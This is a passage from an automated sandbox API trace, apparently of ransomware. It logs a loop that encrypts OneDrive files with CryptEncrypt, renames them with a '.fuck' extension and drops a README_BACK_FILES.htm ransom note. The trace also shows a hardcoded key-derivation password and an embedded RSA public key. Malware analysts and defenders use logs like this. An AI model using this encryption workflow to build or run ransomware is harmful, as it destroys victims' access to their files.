lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.342] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.342] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.342] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.342] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.342] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.342] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.342] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.342] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.342] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.342] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.342] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.342] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.342] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.342] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.343] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.343] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.343] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.343] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.343] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.343] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.343] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.343] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.343] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.343] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.343] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.343] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.343] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.343] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.343] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.344] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.344] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.344] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.344] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.344] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.344] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.344] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.344] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.344] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.344] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.344] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.344] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.344] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.344] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.344] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.344] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.345] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.345] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.345] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.345] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.345] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.345] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.345] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.345] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.345] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.345] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.345] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.345] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.345] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.345] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.345] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.346] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.346] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.346] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.346] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.346] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.346] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.346] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.346] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.346] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x250, lpOverlapped=0x0) returned 1 [0275.346] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x250, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x260) returned 1 [0275.346] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x260, lpOverlapped=0x0) returned 1 [0275.347] CloseHandle (hObject=0x5d48) returned 1 [0275.347] CloseHandle (hObject=0x5d3c) returned 1 [0275.347] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fi\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fi\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0275.352] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0275.353] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fi\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0275.354] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fi\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fi\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0275.356] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0275.356] CryptDestroyKey (hKey=0x2fb488) returned 1 [0275.356] CryptReleaseContext (hProv=0x2f2ac90, dwFlags=0x0) returned 1 [0275.356] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0275.356] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0275.356] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fi\\readme_back_files.htm")) returned 0xffffffff [0275.356] AreFileApisANSI () returned 1 [0275.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0275.356] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0275.357] GetFileType (hFile=0x5d4c) returned 0x1 [0275.357] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0275.358] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.358] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa6c8 [0275.358] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0275.358] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0275.358] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0275.358] GetLastError () returned 0x0 [0275.358] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fil-ph\\filesync.localizedresources.dll.mui")) returned 0x20 [0275.359] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0275.360] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fil-ph\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0275.360] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fil-ph\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0275.361] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fil-ph\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0275.361] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a168) returned 1 [0275.372] CryptCreateHash (in: hProv=0x2f2a168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0275.372] lstrlenA (lpString="CABLQIHbnDAxPSPigSVgweTqzMlQm") returned 29 [0275.372] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0275.372] CryptDeriveKey (in: hProv=0x2f2a168, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0275.373] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0275.373] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, 